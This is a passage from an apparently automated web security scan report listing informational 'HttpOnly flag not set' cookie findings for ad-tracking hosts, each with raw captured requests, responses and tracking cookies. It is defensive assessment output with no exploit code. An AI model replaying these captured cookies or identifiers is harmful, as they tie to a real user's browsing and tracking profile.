Referer: http://loadus.exelator.com/load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9jbS5nLmRvdWJsZWNsaWNrLm5ldC9waXhlbD9uaWQ9ZXhlbGF0ZSZqPTAiIHdpZHRoPSIxIiBoZWlnaHQ9IjEiPjwvaW1nPjxpbWcgc3JjPSJodHRwOi8vYWRzLmFkYnJpdGUuY29tL2Fkc2VydmVyL2JlaGF2aW9yYWwtZGF0YS84MjAxP2Q9MTAzMSIgd2lkdGg9IjAiIGhlaWdodD0iMCIgYm9yZGVyPSIwIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL3NlZ21lbnQtcGl4ZWwuaW52aXRlbWVkaWEuY29tL3NldF9wYXJ0bmVyX3VpZD9wYXJ0bmVySUQ9NzkmcGFydG5lclVJRD0xNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSZzc2NzX2FjdGl2ZT0xIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz4%3D&h=8d858ba9e9afa8b40a627b6ea0e852d0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; partnerUID=eyIxOTkiOiBbIkJERkJGRkMyMzFBMjgyRDZFMjQ0NUI4RTRERTRBMkUwIiwgdHJ1ZV0sICI0OCI6IFsiNjIxMDk0NzA0Nzc4NjMwMDI2ODI4MzM4NDI2NDg1NDcxMjI4NzAiLCB0cnVlXSwgIjg0IjogWyJRNHpndm5Xczk5OXJUU2hCIiwgdHJ1ZV19; subID="{}"; impressions="{\"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]}"; camp_freq_p1="eJzjkuF49ZlFgFFi4+0vb1kUGDV2vgTSBowWYD6XCMeK+axA2cl9p4GyDBoMBgwWDEDRnfeZgaKz5q9FiAIA+4cX7Q=="; io_freq_p1="eJzjkuY4HijAKLHx9pe3LAqMGm9BtAGjBZjPJcyxLRQoObnvNFCSQYPBgMGCASi41wUoOGv+WoQgAJWpFmw="; dp_rec="{\"3\": 1303562003+ \"2\": 1304243633}"; segments_p1=eJzjYuZYEMzFzHE0B0hMNwYSjRFcLBwHuxmBzHMgwdM5QH5nBzOQOVEFyNyxi5GLi2PnPmaBWQfnvGMBCv8LBxIbi4Fy6z8wAsknF0Bk038mkBwHkHnoCIi53w/IvLiXCUg2/weRa/czAgCyXiCB

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 02 May 2011 01:56:44 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 02-May-2011 01:56:24 GMT
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: partnerUID="eyI4NCI6IFsiUTR6Z3ZuV3M5OTlyVFNoQiIsIHRydWVdLCAiMTk5IjogWyJCREZCRkZDMjMxQTI4MkQ2RTI0NDVCOEU0REU0QTJFMCIsIHRydWVdLCAiNDgiOiBbIjYyMTA5NDcwNDc3ODYzMDAyNjgyODMzODQyNjQ4NTQ3MTIyODcwIiwgdHJ1ZV0sICI3OSI6IFsiMTc1NGJiNjUwNjIzYzViZTQzZmNhMGI1N2MzOTEwZDkiLCB0cnVlXX0="; Domain=invitemedia.com; expires=Tue, 01-May-2012 01:56:44 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

17.98. http://sync.mathtag.com/sync/img

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sync.mathtag.com
Path:   /sync/img

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sync/img?mt_exid=1&type=sync&redir=http%3A%2F%2Fads.adbrite.com%2Fadserver%2Fvdi%2F684339%3Fd%3D%5BVISITORDATA%5D HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: sync.mathtag.com
Cookie: uuid=4d50384b-4b5e-0f67-919a-7275589c0b85; ts=1304302151

Response

HTTP/1.1 302 Found
Server: mt2/2.0.17.4.1542 Apr 2 2011 16:34:52 ewr-pixel-x4 pid 0x71da 29146
Cache-Control: no-cache
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Mon, 02 May 2011 02:09:31 GMT
Location: http://ads.adbrite.com/adserver/vdi/684339?d=uuid%3D4d50384b-4b5e-0f67-919a-7275589c0b85
Etag: 4d50384b-4b5e-0f67-919a-7275589c0b85
Connection: Keep-Alive
Set-Cookie: ts=1304302171; domain=.mathtag.com; path=/; expires=Tue, 01-May-2012 02:09:31 GMT
Content-Length: 0


17.99. http://tags.bluekai.com/site/2831

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/2831

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/2831?phint=zip=&phint=age=&phint=gender=&phint=segment=000 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://tags.bluekai.com/site/3945?ret=html&phint=__bk_t%3DLogin%20%7C%20Japanator.com%3A%20anime%20news%2C%20original%20features%2C%20and%20weird%20stories%20from%20Japan%2C%20updated%20daily!&phint=__bk_k%3Danime%2C%20manga%2C%20japanimation%2C%20Japanese%20animation%2C%20news%2C%20information%2C%20reviews%2C%20forum%2C%20columns%2C%20answerman%2C%20shelf%20life%2C%20press%20releases%2C%20DVD%2C%20release%20dates%2C%20encyc%2C%20encyclopedia%2C%20cast%2C%20staff%2C%20seiyuu%2C%20otaku%2C%20Japan%20Blog%2C%20Japanator%2C%20ANN&limit=4&r=25552944
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=exy99JnggW62duLG; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101jqAtKWn9WuzOUD=; bklc=4dbe0f3c; bk=VO+y8416vaVVIHOf; bkc=KJpn8s5QIwsRAzsD48XFWy1ex0SxgdR/kSI1h+K3jDeC1NViXgA3DwAFAke86rvGdOQVOJIEkTaCrQAMyISPmlyjG4hfv3CXh6Tsae8/wTpwOruFZXF/LO3JUTws7tvYTcB01E9zZ1b9yA2oHrDfB3e0xEu0Kq5PD16crxIjel/4M9X9/L2WXx==; bko=KJynWtHQLmc48XF/R9BAZRJjlgyxaCBe/oEapeYJeSvmQ6sVMTaCXXG5FQG1AAeVZHDf4wAj3GYLA6+t9wDSLp1yf9mpfQeNoiysLPuOgsyKW9L9NjzRV9==; bkst=KJhkMf2ny69DhtXGYeShQbBxcaye2dw5cqMWs3+YvecSD4cYOScxeisJm9FrhUdOHHxUxx5hzcOtXV2yzcap25votwUpw+dlF3IaUoRHVAnkKeuKNm1pfpkrGEKcBkesnOU9quYP1xcwgxQ1JCOGSb00Y7w9qwoNfd0wIHViXIgxM6mgiWA1GY7MDCeOOeYCMtzUmrt8hmRLWuIi0dqYlZrcNoamAFwLzYevUqolvg5sFm37BBPx8GBIAVfl4grwpgNhfCg3CPWShz1WHtP2WmlnGMyOWNja+M1jpqgTUkmPuL3j9Ay6oPJhGWHBFIdzrmLM8vabRW65UFYMSkiJ3y4cwdtZixxxH7YOYz6Jh+MGwYmQeezb00cEf6IBKfF0ffzdGIjiVQ==; bkw5=KJpfoXU9y1OP049nunW0JnQh1e90zc/5Z1f9LWDU/L1aGCirsuaAEicJzewXHjnjjLg9T1jj0UYOcuHZjyAi1dZkhHAR+vt9iCkvsWTyQ1xRyYx7flxEHQj2JOAZaJ7q5QQjjCxj5lLxryx3OicjKsFZ1Mv6mp9yoWkD13u9hPTT/a09vF1uuzq9YK/4AetzespmYwdW91meQqKuTxDp0slgluObZYGjswRi0E9pnWSuIKSOqBG8eTHo9aiV1f6=; bkdc=res

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 02:02:13 GMT
Set-Cookie: bklc=4dbe10a5; expires=Wed, 04-May-2011 02:02:13 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Tue, 03 May 2011 02:02:13 GMT
Cache-Control: max-age=86400, private
Set-Cookie: bk=BN6qAw16vaVVIHOf; expires=Sat, 29-Oct-2011 02:02:13 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJpM8tjQWJjZjaQ3L1IUARsOQHd/4dSB9RUFjRpvMtaOXew8sHCIwsjA1mU48XLW8SL2xrDgGdsNSCkxIW0P3c0rYkEIi0HDFgxTvCdAcCi4A8KORqGJ/XwZkEF9fQwhfbZQXC6fsPeT/w6ywCrxFtTr/XB3JcTBs7IvYRnw0zU9zs9b9yGdoHZPf2i90Q4H0mq5PAWNcIxIjef/4E9I9aW+E6D=; expires=Sat, 29-Oct-2011 02:02:13 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJhkMpNn96WxC3z/YYRhQ3Dxnsyw27BtathiwvwYWKJouLD22C9YuHcrE30a21sdAWRDs6WnLqYy+FWlVBMRtq3UvriDppypX6Ta7ozOki9qeGSMR7CKKTG3XmgHJiEz1R7YODoqsTMD0z9uiGahNZZ7iDeYo82ll724UYWqnh82KfxsUOaWyfCxAAGrAD+p1gdx3/vFtV3oH+VabSl82aUNlXJgMpq92cGU0PaUj7+Ld6h+e6EKiPkL1Wrf7UsX6d8ow7Cl8+NNSn4Ym/pbwHJZhVaTG1qjv5oVwA8tHTB8ic3+p1QDWNyMGRRhoxD03354+ff5g9wDGmQbVfxrhUcKpIUAlFmwKokW/DGgCuuDojxxRAtSDBHVVJmAZJilh2v2V47pt0XbhaI+; expires=Sat, 29-Oct-2011 02:02:13 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Tue, 03-May-2011 02:02:13 GMT; path=/; domain=.bluekai.com
BK-Server: c53d
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;

17.100. http://tags.bluekai.com/site/2893

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/2893

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/2893?id=3419824627245671268 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://tags.bluekai.com/site/3945?ret=html&phint=__bk_t%3DLogin%20%7C%20Japanator.com%3A%20anime%20news%2C%20original%20features%2C%20and%20weird%20stories%20from%20Japan%2C%20updated%20daily!&phint=__bk_k%3Danime%2C%20manga%2C%20japanimation%2C%20Japanese%20animation%2C%20news%2C%20information%2C%20reviews%2C%20forum%2C%20columns%2C%20answerman%2C%20shelf%20life%2C%20press%20releases%2C%20DVD%2C%20release%20dates%2C%20encyc%2C%20encyclopedia%2C%20cast%2C%20staff%2C%20seiyuu%2C%20otaku%2C%20Japan%20Blog%2C%20Japanator%2C%20ANN&limit=4&r=25552944
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=exy99JnggW62duLG; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101jqAtKWn9WuzOUD=; bklc=4dbe0f3c; bk=VO+y8416vaVVIHOf; bkc=KJpn8s5QIwsRAzsD48XFWy1ex0SxgdR/kSI1h+K3jDeC1NViXgA3DwAFAke86rvGdOQVOJIEkTaCrQAMyISPmlyjG4hfv3CXh6Tsae8/wTpwOruFZXF/LO3JUTws7tvYTcB01E9zZ1b9yA2oHrDfB3e0xEu0Kq5PD16crxIjel/4M9X9/L2WXx==; bko=KJynWtHQLmc48XF/R9BAZRJjlgyxaCBe/oEapeYJeSvmQ6sVMTaCXXG5FQG1AAeVZHDf4wAj3GYLA6+t9wDSLp1yf9mpfQeNoiysLPuOgsyKW9L9NjzRV9==; bkst=KJhkMf2ny69DhtXGYeShQbBxcaye2dw5cqMWs3+YvecSD4cYOScxeisJm9FrhUdOHHxUxx5hzcOtXV2yzcap25votwUpw+dlF3IaUoRHVAnkKeuKNm1pfpkrGEKcBkesnOU9quYP1xcwgxQ1JCOGSb00Y7w9qwoNfd0wIHViXIgxM6mgiWA1GY7MDCeOOeYCMtzUmrt8hmRLWuIi0dqYlZrcNoamAFwLzYevUqolvg5sFm37BBPx8GBIAVfl4grwpgNhfCg3CPWShz1WHtP2WmlnGMyOWNja+M1jpqgTUkmPuL3j9Ay6oPJhGWHBFIdzrmLM8vabRW65UFYMSkiJ3y4cwdtZixxxH7YOYz6Jh+MGwYmQeezb00cEf6IBKfF0ffzdGIjiVQ==; bkw5=KJpfoXU9y1OP049nunW0JnQh1e90zc/5Z1f9LWDU/L1aGCirsuaAEicJzewXHjnjjLg9T1jj0UYOcuHZjyAi1dZkhHAR+vt9iCkvsWTyQ1xRyYx7flxEHQj2JOAZaJ7q5QQjjCxj5lLxryx3OicjKsFZ1Mv6mp9yoWkD13u9hPTT/a09vF1uuzq9YK/4AetzespmYwdW91meQqKuTxDp0slgluObZYGjswRi0E9pnWSuIKSOqBG8eTHo9aiV1f6=; bkdc=res

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 02:04:03 GMT
Set-Cookie: bklc=4dbe1113; expires=Wed, 04-May-2011 02:04:03 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Tue, 03 May 2011 02:04:03 GMT
Cache-Control: max-age=86400, private
Set-Cookie: bk=gA7hed16vaVVIHOf; expires=Sat, 29-Oct-2011 02:04:03 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJpp8VjQI17Y0Y9Lr1IUARsOyH4/B2JCxmccLYeTZ4y1eeXK1pvRXrdpjRn0NHbCXoUHIa3NeYCXoAoDwkzavF2aWio4VC0Pel/wM1dJ0X9ylRuHR4wvcVelQ4MlPae8Mo61vc0x4Ci4ezC4B8KHREDuFySBwXDWyK4ARZ9T1J6OCjduM1olqWekQtCAXtbgGJGwzCX0cIxIsOX98U5nHx==; expires=Sat, 29-Oct-2011 02:04:03 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJhkMp2n96WDhnz/YYRhuWGCVBQKfndl5C5LRM0MxQMhBvUic7L/QSx/504VxFgQPf9HhDqxxiyLgslXeORt5gqrUHV6dzl1ZlAPXgh10OJJhbwhJOI4Nj8ba4n36xSJCKm96QPvVhF/hWaQvzw9mmr66Nxia4wwmI2dUpyOMHKwFMN3W3WGGraYvZ9Q99VRTfvCDPN/qJSJUgP1usR6kXQPkTYvz5EBNDvIgwfgrwJG7jMOTeyIfWmb0d5mN5j/j+t/HyqEoBI5H+r572Se2N8ffhgo+11Gf96cBWppQlO4E51E+mNLsr21HrVrK36RDjxnMjxjpoUtR8iK42NbrPD7oWq0FgB8I6/Kjz11jFKK42unJxGHnWiQMYK1DZoBWMwDPkGEJhiq+X4YKfw08dP4OZJMaQ==; expires=Sat, 29-Oct-2011 02:04:03 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Tue, 03-May-2011 02:04:03 GMT; path=/; domain=.bluekai.com
BK-Server: f349
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;

17.101. http://tags.bluekai.com/site/3754

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/3754

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/3754?phint=ea%3DNA&phint=eb%3DNA&phint=ec%3DNA&phint=ed%3DNA&phint=ee%3DNA&ret=html&id=PARTNER_UUID HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://tags.bluekai.com/site/3945?ret=html&phint=__bk_t%3DLogin%20%7C%20Japanator.com%3A%20anime%20news%2C%20original%20features%2C%20and%20weird%20stories%20from%20Japan%2C%20updated%20daily!&phint=__bk_k%3Danime%2C%20manga%2C%20japanimation%2C%20Japanese%20animation%2C%20news%2C%20information%2C%20reviews%2C%20forum%2C%20columns%2C%20answerman%2C%20shelf%20life%2C%20press%20releases%2C%20DVD%2C%20release%20dates%2C%20encyc%2C%20encyclopedia%2C%20cast%2C%20staff%2C%20seiyuu%2C%20otaku%2C%20Japan%20Blog%2C%20Japanator%2C%20ANN&limit=4&r=25552944
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=exy99JnggW62duLG; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101jqAtKWn9WuzOUD=; bklc=4dbe0f3c; bk=VO+y8416vaVVIHOf; bkc=KJpn8s5QIwsRAzsD48XFWy1ex0SxgdR/kSI1h+K3jDeC1NViXgA3DwAFAke86rvGdOQVOJIEkTaCrQAMyISPmlyjG4hfv3CXh6Tsae8/wTpwOruFZXF/LO3JUTws7tvYTcB01E9zZ1b9yA2oHrDfB3e0xEu0Kq5PD16crxIjel/4M9X9/L2WXx==; bko=KJynWtHQLmc48XF/R9BAZRJjlgyxaCBe/oEapeYJeSvmQ6sVMTaCXXG5FQG1AAeVZHDf4wAj3GYLA6+t9wDSLp1yf9mpfQeNoiysLPuOgsyKW9L9NjzRV9==; bkst=KJhkMf2ny69DhtXGYeShQbBxcaye2dw5cqMWs3+YvecSD4cYOScxeisJm9FrhUdOHHxUxx5hzcOtXV2yzcap25votwUpw+dlF3IaUoRHVAnkKeuKNm1pfpkrGEKcBkesnOU9quYP1xcwgxQ1JCOGSb00Y7w9qwoNfd0wIHViXIgxM6mgiWA1GY7MDCeOOeYCMtzUmrt8hmRLWuIi0dqYlZrcNoamAFwLzYevUqolvg5sFm37BBPx8GBIAVfl4grwpgNhfCg3CPWShz1WHtP2WmlnGMyOWNja+M1jpqgTUkmPuL3j9Ay6oPJhGWHBFIdzrmLM8vabRW65UFYMSkiJ3y4cwdtZixxxH7YOYz6Jh+MGwYmQeezb00cEf6IBKfF0ffzdGIjiVQ==; bkw5=KJpfoXU9y1OP049nunW0JnQh1e90zc/5Z1f9LWDU/L1aGCirsuaAEicJzewXHjnjjLg9T1jj0UYOcuHZjyAi1dZkhHAR+vt9iCkvsWTyQ1xRyYx7flxEHQj2JOAZaJ7q5QQjjCxj5lLxryx3OicjKsFZ1Mv6mp9yoWkD13u9hPTT/a09vF1uuzq9YK/4AetzespmYwdW91meQqKuTxDp0slgluObZYGjswRi0E9pnWSuIKSOqBG8eTHo9aiV1f6=; bkdc=res

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 02:02:46 GMT
Set-Cookie: bklc=4dbe10c6; expires=Wed, 04-May-2011 02:02:46 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=cZ6ypw16vaVVIHOf; expires=Sat, 29-Oct-2011 02:02:46 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJhqhz49GntsAKsRye84HQRsCkP9dCzVPcT1Yymz7X7wyweM1umev4XIU0RGUI6HvkXjMS2P0TeYjboW8UBPGwJ4Jvc0ozPHIuelywizF9y1666RsESFl9atcTCdEyVPf2MJQ1/cbR4htReX5U1jsPRMXVFxIaB1WchmnQSs921jDwQopSCXhyjDwGCsBrItY3g8/wzCX6crQdWOi8PmX9==; expires=Sat, 29-Oct-2011 02:02:46 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJhkMg2ny69RCZXGYnSNQ3Bxcaye2dmfmlYJqSyPRZlE5gHT/DW/+WBJ/LbYKda4zOcaH5OOmMC65FaFzcOhzdUu35eNIjfld5TuK+2WS9mkTtxX0zKUkEKdCeTLtAzCibQ9cMkusKwymOvmyxxzcjk/HxopysptdVE2p2DvDj+q2sFHeZ/u9tMvrOHW19a1bwwkCNo8JUsyEwMgbvSXN7+76HfulK8PtmI/2JitnIHCygBVx91BS5hoERBZTbdIR+NfbIbiCrLa7MdLRidBK2bJ7vRM1sTteRXZ0UJn+PJ1ojJ0oQ9EESkDcYCHL82cKb8UWS3QFOmjlnlZQt0Ri5+70fI3hH/J//pQ9C1SWT0h6Ua/xOkr5OCe3OKFC4ryPUuzrqlI35zqexq+8ZJffFXeiGhMM9==; expires=Sat, 29-Oct-2011 02:02:46 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Tue, 03-May-2011 02:02:46 GMT; path=/; domain=.bluekai.com
BK-Server: 3550
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;

17.102. http://tags.bluekai.com/site/3945

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/3945

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/3945?ret=html&phint=__bk_t%3DWelcome%20%7C%20Japanator.com%3A%20anime%20news%2C%20original%20features%2C%20and%20weird%20stories%20from%20Japan%2C%20updated%20daily!&phint=__bk_k%3Danime%2C%20manga%2C%20japanimation%2C%20Japanese%20animation%2C%20news%2C%20information%2C%20reviews%2C%20forum%2C%20columns%2C%20answerman%2C%20shelf%20life%2C%20press%20releases%2C%20DVD%2C%20release%20dates%2C%20encyc%2C%20encyclopedia%2C%20cast%2C%20staff%2C%20seiyuu%2C%20otaku%2C%20Japan%20Blog%2C%20Japanator%2C%20ANN&limit=4&r=22181052 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=exy99JnggW62duLG; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101jqAtKWn9WuzOUD=; bkst=KJy5MgNvhW9DCVIh/sCuVx3nCVNQ4rd1kcsBbyGChmiViC1ZY/aLWjv/ntYdI9ot0MSYakRVFGcwRsaMjIFL+r5X4mK1Tc6qR9rboZTVxl1EFvDMIweH9jEz1R7YHDoqsT7v0zQuioahNZZ7iDeYk2dw7FdNdY8yHH9BT6JJvgkWnLlkHFKy9f9wJL2F0dB15i5L536mS2awYNRRfvoLtCjcAfdhitz4wqLcApQoA7uKAbxqpoJENUjUSmmInRXU2DRjOr+aooMQsQANMYA+Aas2dc702EQWYse/7OlimlcHpl+8Fdn8PfCIGCYkkD/u0iovYnsZvik3vbyov0pB8IL3dx5GsWZQ; bk=e1mPh2iZ/VKVIHOf; bkc=KJpM8sPQZsfY0nO88x84HQRsOATQd8Tvv+IhAysacXmYTn1OIKFZ1MvLHrnUGws7ZYeT7ay1e9KZ1beyD8oHIRTB3cyxMVpKqHPDX6crxISel94M9yODsYNN; bko=KJ0E8VBQtnh0CbXYQ0ux5Vqaek2ICiGQbIuucqb1e1qLe9pfyvyfF9y1vR+OnsXTuhU/0rROLHvOg9yySh/qC1U1999p5HUd; bkw5=KJpE+Z/9QCvsW6YuWzxWAo0X666Rs4uHjJCxjsfq/VuRDVEzfDcLW3QRCsEMgj7n0999mnyv5x==

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 01:58:50 GMT
Set-Cookie: bklc=4dbe0fda; expires=Wed, 04-May-2011 01:58:50 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=chBAO2thl+ZVIHOf; expires=Sat, 29-Oct-2011 01:58:50 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJpn8s5QIwsRAKWVdp84HQRsCAyQUI6HvkXjMS2P0TeYjboW8UBPGwJ4Jvc0ozPHIEWLYeT7nywe5OBsCL6g5Xe82NHxIRb5eYCXAcTR7yl/UpKUAVWNWgXsMEdaO1c78sJQmeY59RV46Gpv5th98RBGjwBr3bYSel/41CdAwCQ491l+ugD=; expires=Sat, 29-Oct-2011 01:58:50 GMT; path=/; domain=.bluekai.com
Set-Cookie: bko=KJynWtHQr1Vdp8KHxjSwQVcp0CtIYQ0uxBSjaE+XIHZ3Qv0EulR9jRljsHMtQPklKOARDCSeVBbXWnN1evo9PMRwuYyHvLq11/AByZJk999zIhAI; expires=Sat, 29-Oct-2011 01:58:50 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJh5MfNvhW9DCVIh/sCVY6+CLq9BpmI5ZEvrzPPRkCM5D7cYOYsyVTxATQFRnfbYMuQtQCjiRVa+RI1nVBMRtEgjuZ0dXlcmFHNTVQHRQsouEvqB8eHTccqQhS1B0nCMWGDnkqRtanZEGuDDxImL66TEQREwwZI2ddSlTZwktSBFMNSOvTJGsO5vDLAkzZZm8QrUuyegRJnAneLR0V3cfjbGpDnDQ8ukO3+XBYMEg48wf2bfP285QlTDoday7JYTSFqMwPPVhtiMrL0toXVXLCr6i6yhyEDuSCCEViYMKFjNTIBKa0Y9jrHLW8tnyloz0TLfp2IffuDvDPGoJvWLoTxxSdv1GgqYZipcpnyI+mfNXgXd4yc+WaPx; expires=Sat, 29-Oct-2011 01:58:50 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkw5=KJpfoXU9y1OP049nunW0JnQh1e90zc/5Z1f9L1tDQzsBL8nC9M+/p1TuHsq0uTLp1sCq9HDpkeYzR9YJ1ROJE+foJGy1IAQ0EYQ0+I6x1LyG1rft/cRJP9hYLFcVpsPASc5QRWiE3sH/9Rr2zWYT9aUZJjv1QHwWw0OfrO7R7OcItxF6syBFJz1njoeqag+O2eOP1M999Jbv/oA=; expires=Sat, 29-Oct-2011 01:58:50 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Tue, 03-May-2011 01:58:50 GMT; path=/; domain=.bluekai.com
BK-Server: c45a
Content-Length: 997
Content-Type: text/html
Connection: keep-alive

<html>
<head>
</head>
<body>
<div id="bk_exchange">
<img src="http://ad.yieldmanager.com/pixel?id=1182722&id=1182795&id=1182798&id=1182799&id=1182843&t=2" width=1 height=1 border=0 alt="">
<img src="h
...[SNIP]...

17.103. http://translate.googleapis.com/translate_a/l

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.googleapis.com
Path:   /translate_a/l

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /translate_a/l?client=te&hl=en&cb=_callbacks_._0gn72h6kz HTTP/1.1
Host: translate.googleapis.com
Proxy-Connection: keep-alive
Referer: http://www.greenhulk.net/forums/register.php
